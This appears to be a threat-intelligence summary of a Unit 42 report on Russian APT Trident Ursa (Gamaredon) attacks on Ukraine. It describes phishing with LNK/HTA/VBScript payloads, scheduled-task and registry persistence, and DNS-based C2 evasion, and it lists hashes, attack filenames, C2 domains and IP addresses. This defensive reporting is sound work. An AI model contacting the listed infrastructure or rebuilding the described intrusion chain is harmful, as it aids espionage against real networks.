Unit 42 documents continued Trident Ursa (Gamaredon) activity targeting Ukraine, detailing a long-running, multi-faceted campaign with hundreds of new domains and samples. The analysis highlights DNS manipulation, phishing campaigns delivering LNK/HTA/VBS payloads, and persistent, multi-stage C2 and evasion techniques.
#TridentUrsa #Gamaredon #Ukraine #Unit42 #Anton
#TridentUrsa #Gamaredon #Ukraine #Unit42 #Anton
Keypoints
- Trident Ursa remains a pervasive, active APT focused on Ukraine and allied networks, attributed to Russia’s FSB.
- Unit 42 mapped over 500 new domains, 200 samples, and other IoCs in roughly the last 10 months to support Trident Ursa’s phishing and malware operations.
- Notable items include an unsuccessful attempt to compromise a large NATO member petroleum refinery and threats against Ukrainian researchers tied to the group.
- DNS-centric techniques, including fast flux and innovative DNS workarounds, are central to the group’s resilience and evasion.
- Phishing campaigns use HTML and Word documents delivering LNKs/HTAs with VBScript payloads and persistence mechanisms (scheduled tasks and registry run keys).
- Droppers like 7ZSfxMod_x86.exe and Myfile.exe, plus VBScript-based payloads, drive the C2 and post-compromise behavior with multiple fallback IPs and Telegram lookups.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – HTML files delivered as attachments/links containing malicious content that leads to LNK-based execution. “These .html files contain Base64-encoded .rar archives that in turn contain a malicious .lnk file.”
- [T1218.005] Signed Binary Proxy Execution: Mshta – The LNKs use mshta.exe to download and execute payloads via URL. “the .lnk shortcut uses mshta.exe to contact via a command line argument.”
- [T1059.005] Command and Scripting Interpreter: VBScript – VBScript is decoded/executed and used for persistence and payload delivery. “The VBScript decoded and executed by the file is responsible for adding persistence by running the VBScript saved to the josephine file each time the user logs in.”
- [T1105] Ingress Tool Transfer – Downloading additional files via URL to stage further payloads. “download additional files via URL”
- [T1053.005] Scheduled Task – Persistence by creating a Windows scheduled task that runs payloads every five minutes. “Filmora.Complete scheduled task… runs the josephine script every five minutes.”
- [T1112] Modify Registry – Registry-based persistence via an autorun key. “autorun registry key… run the VBScript at user login.”
- [T1547.001] Boot or Logon Autostart: Registry Run Keys/Startup Folder – Similar autostart persistence via registry keys. “telemetry… run the VBScript at user login.”
- [T1047] Windows Management Instrumentation – WMI queries to determine C2 IPs. “WMI query and checking the ProtocolAddress value to determine the C2 IP address.”
- [T1071.001] Web Protocols – C2 communication via HTTP(S) requests and encoded responses. “custom HTTP GET request” and response-based VBScript execution.
- [T1027] Obfuscated/Compressed Files and Information – Obfuscated/bundled payloads and random strings to hinder analysis. “random 10-character strings… appended… confuses analysis.”
Indicators of Compromise
- [Hash] SHA256 samples related to English-language samples – b1bc659006938eb5912832eb8412c609d2d875c001ab411d1b69d343515291b7, 0b63f6e7621421de9968d46de243ef769a343b61597816615222387c45df80ae, and 1 more hash (303abc6d8ab41cb00e3e7a2165ecc1e7fb4377ba46a9f4213a05f764567182e5)
- [Filename] Notable phishing attachments – MilitaryassistanceofUkraine.htm, Necessary_military_assistance.rar
- [Domain] Domains used in infrastructure – josephine71.alabarda.ru, relax.salary48.minhizo.ru
- [IP] C2 and infrastructure IPs – 104.248.36.191, 64.227.67.175
- [Filename] Droppers and payloads – along.rcs, 7ZSfxMod_x86.exe, Myfile.exe
Read more: https://unit42.paloaltonetworks.com/trident-ursa/